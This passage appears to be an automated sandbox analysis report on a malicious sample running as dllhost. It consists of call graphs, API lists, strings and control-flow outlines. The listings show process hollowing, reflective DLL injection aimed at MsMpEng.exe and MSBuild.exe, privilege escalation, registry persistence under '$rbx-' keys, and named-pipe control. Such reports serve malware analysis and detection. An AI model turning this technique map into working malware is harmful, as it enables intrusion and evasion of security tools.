15707->15708 15712 140001868 31 API calls 15708->15712 15710->15691 15737 140002434 15710->15737 15712->15678 15718 1400022d8 SysFreeString SysFreeString 15717->15718 15719 1400021bd CoInitializeSecurity 15717->15719 15718->15689 15720 140002205 CoCreateInstance 15719->15720 15721 1400021f9 15719->15721 15722 1400022d2 CoUninitialize 15720->15722 15723 140002234 VariantInit 15720->15723 15721->15720 15721->15722 15722->15718 15724 14000228a 15723->15724 15724->15722 15726 140001cf0 13 API calls 15725->15726 15728 140001fba 15726->15728 15727 140001fe8 GetProcessHeap HeapFree 15728->15727 15729 140001eec 5 API calls 15728->15729 15729->15728 15731 1400020cc 2 API calls 15730->15731 15732 140002c71 15731->15732 15734 140002120 ReadFile 15733->15734 15735 140002143 15734->15735 15736 14000215d 15734->15736 15735->15734 15735->15736 15736->15662 15736->15694 15738 14000246f 15737->15738 15762 140002726 15737->15762 15739 1400020cc 2 API calls 15738->15739 15744 1400024ae 15738->15744 15738->15762 15739->15744 15740 1400024d7 CreateProcessW 15740->15744 15741 1400028e1 OpenProcess 15743 1400028f1 TerminateProcess 15741->15743 15741->15744 15742 1400020cc GetModuleHandleA GetProcAddress 15742->15744 15743->15744 15744->15740 15744->15741 15744->15742 15745 14000273f VirtualAllocEx 15744->15745 15746 140002566 VirtualAllocEx 15744->15746 15751 140002682 VirtualAlloc 15744->15751 15752 140002858 VirtualAlloc 15744->15752 15753 1400025f9 WriteProcessMemory 15744->15753 15755 1400027d0 WriteProcessMemory 15744->15755 15744->15762 15763 14000281a VirtualProtectEx 15744->15763 15764 140002643 VirtualProtectEx 15744->15764 15745->15744 15747 14000276d WriteProcessMemory 15745->15747 15746->15744 15748 140002595 WriteProcessMemory 15746->15748 15747->15744 15750 14000278f VirtualProtectEx 15747->15750 15748->15744 15749 1400025b7 VirtualProtectEx 15748->15749 15749->15744 15750->15744 15751->15744 15756 1400026a7 GetThreadContext 15751->15756 15752->15744 15754 140002879 Wow64GetThreadContext 15752->15754 15753->15744 15754->15744 15757 140002891 WriteProcessMemory 15754->15757 15755->15744 15756->15744 15758 1400026c4 WriteProcessMemory 15756->15758 15757->15744 15759 1400028b6 Wow64SetThreadContext 15757->15759 15758->15744 15760 1400026ef SetThreadContext 15758->15760 15759->15744 15760->15744 15761 140002712 ResumeThread 15760->15761 15761->15744 15761->15762 15762->15702 15763->15744 15764->15744 15766 140001f65 15765->15766 15767 140001f0b OpenProcess 15765->15767 15766->15691 15767->15766 15768 140001f23 15767->15768 15769 140002bfc 2 API calls 15768->15769 15770 140001f43 15769->15770 15771 140001f5c CloseHandle 15770->15771 15772 140001f51 CloseHandle 15770->15772 15771->15766 15772->15771 17985 20175ebfe20 17986 20175ebfe4a 17985->17986 17987 20175ebd220 _invalid_parameter_noinfo 13 API calls 17986->17987 17988 20175ebfe6a 17987->17988 17989 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17988->17989 17990 20175ebfe78 17989->17990 17991 20175ebd220 _invalid_parameter_noinfo 13 API calls 17990->17991 17993 20175ebfea2 17990->17993 17994 20175ebfe94 17991->17994 17992 20175ebfec1 InitializeCriticalSectionEx 17992->17993 17993->17992 17995 20175ebfeab 17993->17995 17996 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17994->17996 17996->17993 19328 20175ebf820 19331 20175ebf7d8 19328->19331 19336 20175ebc558 EnterCriticalSection 19331->19336 16756 20175eb4320 16759 20175eb426d 16756->16759 16757 20175eb42d7 16758 20175eb42bd VirtualQuery 16758->16757 16758->16759 16759->16757 16759->16758 16760 20175eb4322 GetLastError 16759->16760 16760->16759 18006 20175ebc218 18007 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18006->18007 18008 20175ebc228 18007->18008 18009 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18008->18009 18010 20175ebc23c 18009->18010 18011 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18010->18011 18012 20175ebc250 18011->18012 18013 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18012->18013 18014 20175ebc264 18013->18014 18015 20175ec4611 __scrt_dllmain_exception_filter 18963 20175eb2518 GetProcessIdOfThread GetCurrentProcessId 18964 20175eb25be 18963->18964 18965 20175eb2543 CreateFileW 18963->18965 18965->18964 18966 20175eb2577 WriteFile ReadFile CloseHandle 18965->18966 18966->18964 19350 20175ebb7ea 19351 20175ebc2f4 14 API calls 19350->19351 19352 20175ebb7ef 19351->19352 19353 20175ebb85f 19352->19353 19354 20175ebb815 GetModuleHandleW 19352->19354 19367 20175ebb6f8 19353->19367 19354->19353 19358 20175ebb822 19354->19358 19358->19353 19362 20175ebb904 GetModuleHandleExW 19358->19362 19363 20175ebb938 GetProcAddress 19362->19363 19364 20175ebb94a 19362->19364 19363->19364 19365 20175ebb95b FreeLibrary 19364->19365 19366 20175ebb962 19364->19366 19365->19366 19366->19353 19379 20175ebc558 EnterCriticalSection 19367->19379 19380 20175eb2ff0 19381 20175eb3061 19380->19381 19382 20175eb3384 19381->19382 19383 20175eb308d GetModuleHandleA 19381->19383 19384 20175eb309f GetProcAddress 19383->19384 19385 20175eb30b1 19383->19385 19384->19385 19385->19382 19386 20175eb30d8 StrCmpNIW 19385->19386 19386->19382 19390 20175eb30fd 19386->19390 19387 20175eb1a30 6 API calls 19387->19390 19388 20175eb320f lstrlenW 19388->19390 19389 20175eb32b9 lstrlenW 19389->19390 19390->19382 19390->19387 19390->19388 19390->19389 19391 20175eb1cfc StrCmpIW StrCmpW 19390->19391 19392 20175eb3f88 StrCmpNIW 19390->19392 19391->19390 19392->19390 19439 20175eb63e3 19440 20175eb63f0 19439->19440 19441 20175eb63fc GetThreadContext 19440->19441 19446 20175eb655a 19440->19446 19442 20175eb6422 19441->19442 19441->19446 19442->19446 19448 20175eb6449 19442->19448 19443 20175eb663e 19445 20175eb665e 19443->19445 19450 20175eb4b20 VirtualFree 19443->19450 19444 20175eb6581 VirtualProtect FlushInstructionCache 19444->19446 19447 20175eb5530 3 API calls 19445->19447 19446->19443 19446->19444 19453 20175eb6663 19447->19453 19449 20175eb64cd 19448->19449 19451 20175eb64a6 SetThreadContext 19448->19451 19450->19445 19451->19449 19452 20175eb6677 ResumeThread 19452->19453 19453->19452 19454 20175eb66b7 19453->19454 19455 20175eb8070 _invalid_parameter_noinfo 8 API calls 19454->19455 19456 20175eb66ff 19455->19456 19457 20175eb27e8 19458 20175eb2867 19457->19458 19459 20175eb28c9 GetFileType 19458->19459 19470 20175eb2998 19458->19470 19460 20175eb28ed 19459->19460 19461 20175eb28d7 StrCpyW 19459->19461 19463 20175eb1ad4 4 API calls 19460->19463 19462 20175eb28fc 19461->19462 19466 20175eb299d 19462->19466 19471 20175eb2906 19462->19471 19463->19462 19464 20175eb3f88 StrCmpNIW 19464->19466 19465 20175eb3f88 StrCmpNIW 19465->19471 19466->19464 19467 20175eb3708 4 API calls 19466->19467 19468 20175eb1dd4 2 API calls 19466->19468 19466->19470 19467->19466 19468->19466 19469 20175eb3708 4 API calls 19469->19471 19471->19465 19471->19469 19471->19470 19472 20175eb1dd4 2 API calls 19471->19472 19472->19471 19498 20175ebf3e4 19499 20175ebf41d 19498->19499 19500 20175ebf3ee 19498->19500 19500->19499 19501 20175ebf403 FreeLibrary 19500->19501 19501->19500 19502 20175ec33e4 19503 20175ec33fb 19502->19503 19504 20175ec33f5 CloseHandle 19502->19504 19504->19503 16761 20175ee2300 16762 20175ee2331 16761->16762 16763 20175ee2447 16762->16763 16769 20175ee2412 16762->16769 16770 20175ee2355 16762->16770 16764 20175ee24bb 16763->16764 16765 20175ee244c 16763->16765 16768 20175ee35c8 11 API calls 16764->16768 16764->16769 16778 20175ee35c8 GetProcessHeap HeapAlloc 16765->16778 16767 20175ee238d StrCmpNIW 16767->16770 16768->16769 16769->16769 16770->16767 16770->16769 16772 20175ee1d30 16770->16772 16773 20175ee1d57 GetProcessHeap HeapAlloc 16772->16773 16774 20175ee1db4 16772->16774 16773->16774 16775 20175ee1d92 16773->16775 16774->16770 16776 20175ee1cfc 2 API calls 16775->16776 16777 20175ee1d9a GetProcessHeap HeapFree 16776->16777 16777->16774 16782 20175ee361b 16778->16782 16779 20175ee36d9 GetProcessHeap HeapFree 16779->16769 16780 20175ee36d4 16780->16779 16781 20175ee3666 StrCmpNIW 16781->16782 16782->16779 16782->16780 16782->16781 16783 20175ee1d30 6 API calls 16782->16783 16783->16782 18017 20175eb41f9 18018 20175eb4146 18017->18018 18019 20175eb4196 VirtualQuery 18018->18019 18020 20175eb41b0 18018->18020 18021 20175eb41ca VirtualAlloc 18018->18021 18019->18018 18019->18020 18021->18020 18022 20175eb41fb GetLastError 18021->18022 18022->18018 18022->18020 19505 20175eb5ff9 19506 20175eb6000 VirtualProtect 19505->19506 19507 20175eb6029 GetLastError 19506->19507 19508 20175eb5f10 19506->19508 19507->19508 16784 20175eb2300 16785 20175eb2331 16784->16785 16786 20175eb2447 16785->16786 16787 20175eb2355 16785->16787 16794 20175eb2412 16785->16794 16788 20175eb244c 16786->16788 16789 20175eb24bb 16786->16789 16791 20175eb238d StrCmpNIW 16787->16791 16787->16794 16795 20175eb1d30 16787->16795 16801 20175eb35c8 GetProcessHeap HeapAlloc 16788->16801 16792 20175eb35c8 11 API calls 16789->16792 16789->16794 16791->16787 16792->16794 16796 20175eb1db4 16795->16796 16797 20175eb1d57 GetProcessHeap HeapAlloc 16795->16797 16796->16787 16797->16796 16798 20175eb1d92 16797->16798 16799 20175eb1cfc 2 API calls 16798->16799 16800 20175eb1d9a GetProcessHeap HeapFree 16799->16800 16800->16796 16802 20175eb361b 16801->16802 16803 20175eb36d9 GetProcessHeap HeapFree 16802->16803 16804 20175eb36d4 16802->16804 16805 20175eb3666 StrCmpNIW 16802->16805 16806 20175eb1d30 6 API calls 16802->16806 16803->16794 16804->16803 16805->16802 16806->16802 18979 20175ebb500 18984 20175ebc558 EnterCriticalSection 18979->18984 19522 20175ebcbfc 19527 20175ebf3a0 19522->19527 19524 20175ebcc05 19525 20175ebcc22 __vcrt_uninitialize_ptd 19524->19525 19526 20175ebcb10 __std_exception_copy 13 API calls 19524->19526 19526->19525 19528 20175ebf3b5 19527->19528 19529 20175ebf3b1 19527->19529 19528->19529 19530 20175ebef88 9 API calls 19528->19530 19529->19524 19530->19529 16807 20175ec46f5 16808 20175eb9324 __CxxCallCatchBlock 9 API calls 16807->16808 16809 20175ec470d 16808->16809 16810 20175eb9324 __CxxCallCatchBlock 9 API calls 16809->16810 16811 20175ec4728 16810->16811 16812 20175eb9324 __CxxCallCatchBlock 9 API calls 16811->16812 16813 20175ec473c 16812->16813 16814 20175eb9324 __CxxCallCatchBlock 9 API calls 16813->16814 16815 20175ec477e 16814->16815

                                            Executed Functions

                                            Function 0000000140002D4C Relevance: 91.3, APIs: 39, Strings: 13, Instructions: 269registrymemorythreadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 140002d4c-140002d5c 1 140002d5e-140002d75 OpenMutexW 0->1 2 140002d84-140002dc1 CloseHandle call 140002a0c * 2 GetCurrentProcessId OpenProcess 1->2 3 140002d77-140002d82 Sleep 1->3 8 140002dc3-140002dd7 OpenProcessToken 2->8 9 140002e39-140002e64 RegOpenKeyExW 2->9 3->1 10 140002dd9-140002dee LookupPrivilegeValueW 8->10 11 140002e30-140002e33 CloseHandle 8->11 12 1400031b3-1400031c1 9->12 13 140002e6a-140002e94 RegQueryValueExW 9->13 10->11 14 140002df0-140002e28 AdjustTokenPrivileges 10->14 11->9 13->12 15 140002e9a-140002ec4 RegQueryValueExW 13->15 14->11 16 140002e2a GetLastError 14->16 15->12 17 140002eca-140002f36 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 15->17 16->11 17->12 18 140002f3c-140002f66 RegQueryValueExW 17->18 18->12 19 140002f6c-140002fba RegCloseKey GetCurrentProcessId call 14000200c RegCreateKeyExW 18->19 22 14000307d-140003111 CreateThread GetProcessHeap HeapAlloc CreateThread * 2 call 14000151c 19->22 23 140002fc0-140002fe6 ConvertStringSecurityDescriptorToSecurityDescriptorW 19->23 30 140003113-140003143 ShellExecuteW 22->30 31 140003145-1400031ad call 14000148c call 1400011d4 call 14000148c * 3 call 1400011d4 * 3 GetProcessHeap HeapFree SleepEx 22->31 24 140003002-14000303a RegCreateKeyExW 23->24 25 140002fe8-140002ffc RegSetKeySecurity LocalFree 23->25 27 140003073-140003077 RegCloseKey 24->27 28 14000303c-14000306d GetCurrentProcessId RegSetValueExW RegCloseKey 24->28 25->24 27->22 28->27 30->30 30->31 31->12
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Process$Heap$CloseValue$CreateOpen$AllocQuery$CurrentHandleSecurityThread$DescriptorFreeSleepToken$AdjustConvertErrorExecuteLastLocalLookupMutexPrivilegePrivilegesShellStringTerminate
                                            • String ID: $rbx-dll32$$rbx-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d$SOFTWARE$SOFTWARE\$rbx-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
                                            • API String ID: 2725631067-1382791509
                                            • Opcode ID: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
                                            • Instruction ID: 11cca5996524c372b97bd826982d2baaf99c89fd62df68e9b01c6f7d22bdc91e
                                            • Opcode Fuzzy Hash: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
                                            • Instruction Fuzzy Hash: 8DD1E0F6600A4086EB26DF22F8547DA27A5FB8CBD9F404116FB4A43A79DF38C589C744
                                            Function 0000000140001868 Relevance: 58.0, APIs: 29, Strings: 4, Instructions: 287memorystringnativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 48 140001868-1400018aa OpenProcess 49 140001cd1-140001ced 48->49 50 1400018b0-1400018c5 IsWow64Process 48->50 51 1400018d5 50->51 52 1400018c7-1400018d3 50->52 53 1400018db-1400018e7 CloseHandle 51->53 52->53 53->49 54 1400018ed-1400018f8 53->54 54->49 55 1400018fe-140001913 54->55 56 140001925 55->56 57 140001915-14000191a 55->57 59 140001927-140001929 56->59 57->49 58 140001920-140001923 57->58 58->59 59->49 60 14000192f-140001945 OpenProcess 59->60 60->49 61 14000194b-140001964 OpenProcess 60->61 62 140001a04-140001a23 NtQueryInformationProcess 61->62 63 14000196a-140001981 K32GetModuleFileNameExW 61->63 64 140001cc8-140001ccb CloseHandle 62->64 65 140001a29-140001a2d 62->65 66 1400019b3-1400019bf CloseHandle 63->66 67 140001983-14000199e PathFindFileNameW lstrlenW 63->67 64->49 65->64 68 140001a33-140001a4b OpenProcessToken 65->68 66->62 70 1400019c1-1400019db 66->70 67->66 69 1400019a0-1400019b0 StrCpyW 67->69 68->64 71 140001a51-140001a77 GetTokenInformation 68->71 69->66 72 1400019e0-1400019f2 StrCmpIW 70->72 74 140001af4 71->74 75 140001a79-140001a82 GetLastError 71->75 72->64 73 1400019f8-140001a02 72->73 73->62 73->72 77 140001afb-140001b09 CloseHandle 74->77 75->74 76 140001a84-140001a98 LocalAlloc 75->76 76->74 78 140001a9a-140001ac0 GetTokenInformation 76->78 77->64 79 140001b0f-140001b16 77->79 80 140001ae2 78->80 81 140001ac2-140001ae0 GetSidSubAuthorityCount GetSidSubAuthority 78->81 79->64 82 140001b1c-140001b27 79->82 83 140001ae9-140001af2 LocalFree 80->83 81->83 82->64 84 140001b2d-140001b37 82->84 83->77 85 140001b52 84->85 86 140001b39-140001b43 84->86 88 140001b56-140001b8e call 1400029a4 * 3 85->88 86->64 87 140001b49-140001b50 86->87 87->88 88->64 95 140001b94-140001bb4 call 1400029a4 StrStrA 88->95 98 140001bb6-140001bc6 95->98 99 140001bcd-140001bf2 call 1400029a4 * 2 95->99 98->95 101 140001bc8 98->101 99->64 105 140001bf8-140001c21 VirtualAllocEx 99->105 101->64 105->64 106 140001c27-140001c40 WriteProcessMemory 105->106 106->64 107 140001c46-140001c68 call 140002bfc 106->107 107->64 110 140001c6a-140001c72 107->110 110->64 111 140001c74-140001c81 WaitForSingleObject 110->111 112 140001c83-140001c97 GetExitCodeThread 111->112 113 140001cbd-140001cc2 CloseHandle 111->113 114 140001ca2-140001cbb VirtualFreeEx 112->114 115 140001c99-140001c9f 112->115 113->64 114->113 115->114
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
                                            • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
                                            • API String ID: 2456419452-2628171563
                                            • Opcode ID: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
                                            • Instruction ID: 2a11411cfc832b8c6424502e8b4f1e91c9a7b64b89c06221b22f1678334b3336
                                            • Opcode Fuzzy Hash: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
                                            • Instruction Fuzzy Hash: E6C15BB1700A8186EB66DF23B8907EA27A5FB8CBC4F444125EF4A477A5EF38C945C740
                                            Function 0000000140003204 Relevance: 47.5, APIs: 20, Strings: 7, Instructions: 236registrymemoryfileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 116 140003204-140003225 117 14000322b 116->117 118 14000341d-140003423 116->118 119 140003231-140003237 117->119 120 14000338b-1400033c3 GetProcessHeap HeapAlloc K32EnumProcesses 117->120 121 140003599-1400035bd ReadFile 118->121 122 140003429-14000342c 118->122 125 140003382-140003384 ExitProcess 119->125 126 14000323d-140003240 119->126 123 140003652-140003664 120->123 124 1400033c9-1400033da 120->124 121->123 127 1400035c3-1400035ca 121->127 128 140003432-140003438 122->128 129 14000358f-140003594 call 140001f7c 122->129 124->123 130 1400033e0-140003409 call 140001868 * 2 124->130 132 140003246-140003249 126->132 133 1400032ea-140003315 RegOpenKeyExW 126->133 127->123 134 1400035d0-14000360b GetProcessHeap HeapAlloc call 140001cf0 127->134 135 140003534-140003547 call 1400020fc 128->135 136 14000343e-140003441 128->136 129->123 166 14000340e-140003416 130->166 142 1400032db-1400032e5 132->142 143 14000324f-140003252 132->143 139 140003353-14000337d call 14000217c * 2 call 140001f7c call 1400017a8 call 14000200c 133->139 140 140003317-14000334d RegDeleteValueW * 3 133->140 161 14000360d-140003613 134->161 162 14000363e-14000364c GetProcessHeap HeapFree 134->162 135->123 156 14000354d-14000355c call 1400020fc 135->156 145 140003443-140003449 136->145 146 140003480-140003491 call 1400020fc 136->146 139->123 140->139 142->123 152 140003254-14000325a 143->152 153 1400032ce-1400032d6 143->153 145->123 147 14000344f-140003479 call 140002c5c call 140002c88 ExitProcess 145->147 146->123 165 140003497-1400034b9 ReadFile 146->165 152->123 160 140003260-140003284 ReadFile 152->160 153->123 156->123 181 140003562-14000358a ShellExecuteW 156->181 160->123 168 14000328a-140003291 160->168 161->162 169 140003615-140003627 161->169 162->123 165->123 174 1400034bf-1400034c6 165->174 166->130 175 140003418 166->175 168->123 177 140003297-1400032c9 call 140001868 * 2 168->177 170 140003629-14000362b 169->170 171 14000362d-140003635 169->171 170->171 178 140003639 call 140001eec 170->178 171->169 179 140003637 171->179 174->123 182 1400034cc-14000350a GetProcessHeap HeapAlloc ReadFile 174->182 175->123 177->123 178->162 179->162 181->123 182->162 187 140003510-14000351c 182->187 187->162 190 140003522-14000352f call 140002434 187->190 190->162
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
                                            • String ID: $rbx-dll32$$rbx-dll64$$rbx-stager$$rbx-svc32$$rbx-svc64$SOFTWARE$open
                                            • API String ID: 4225498131-1538754800
                                            • Opcode ID: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
                                            • Instruction ID: 6e35c32a62d70e7d93f4307674840714c013e8363098979e1a8d92760cac109a
                                            • Opcode Fuzzy Hash: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
                                            • Instruction Fuzzy Hash: 00B1EAF1204A8196EB77DF27B8643E923A9F74D7C4F408125BB4A47AB9DF398645C700
                                            Function 0000000140001CF0 Relevance: 19.6, APIs: 13, Instructions: 131memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                            • String ID:
                                            • API String ID: 4084875642-0
                                            • Opcode ID: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
                                            • Instruction ID: 4f27d05859a20aa5d5a2c4d21673197ed0af44fd7722cf910b4e92e6674c13e6
                                            • Opcode Fuzzy Hash: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
                                            • Instruction Fuzzy Hash: AB5159B27116808AEB66DF63F8587EA22A1B78DBC4F844025EF5957764DF38C585C600
                                            Function 0000000140002300 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                            • String ID:
                                            • API String ID: 3197395349-0
                                            • Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                            • Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
                                            • Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                            • Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44
                                            Function 0000000140002A0C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                            • String ID: .text$C:\Windows\System32\
                                            • API String ID: 2721474350-832442975
                                            • Opcode ID: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
                                            • Instruction ID: a18771497a2cdddd7f649ca88061091fbee7acde65ae68025fcc699bdcbe0bdc
                                            • Opcode Fuzzy Hash: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
                                            • Instruction Fuzzy Hash: 89517BB270468086EB62DF16F9587DA73A1FB8CBD5F444525AF4A03BA8DF38C558C704
                                            Function 0000000140003728 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                            • String ID: M$\\.\pipe\$rbx-childproc
                                            • API String ID: 2203880229-2840927681
                                            • Opcode ID: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
                                            • Instruction ID: 2fb808d8c0fa1e0908606fb17de5b970416f6dc98e2db846ceffa582aa456b5d
                                            • Opcode Fuzzy Hash: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
                                            • Instruction Fuzzy Hash: B91139F1218A8482E726DB23F8043E9A764A78DBE0F444225BB6A436F9DF7CC548C704
                                            Function 0000000140002CB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 243 140002cb0-140002cba 244 140002cbd-140002cd0 call 140002300 243->244 247 140002cd2-140002cdb Sleep 244->247 248 140002cdd-140002cea ConnectNamedPipe 244->248 247->244 249 140002d21-140002d26 Sleep 248->249 250 140002cec-140002d0d ReadFile 248->250 251 140002d2c-140002d35 DisconnectNamedPipe 249->251 250->251 252 140002d0f-140002d14 250->252 251->248 252->251 253 140002d16-140002d1d call 140003204 252->253 254 140002d1f 253->254 254->251
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                            • String ID: \\.\pipe\$rbx-control
                                            • API String ID: 2071455217-3647231676
                                            • Opcode ID: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
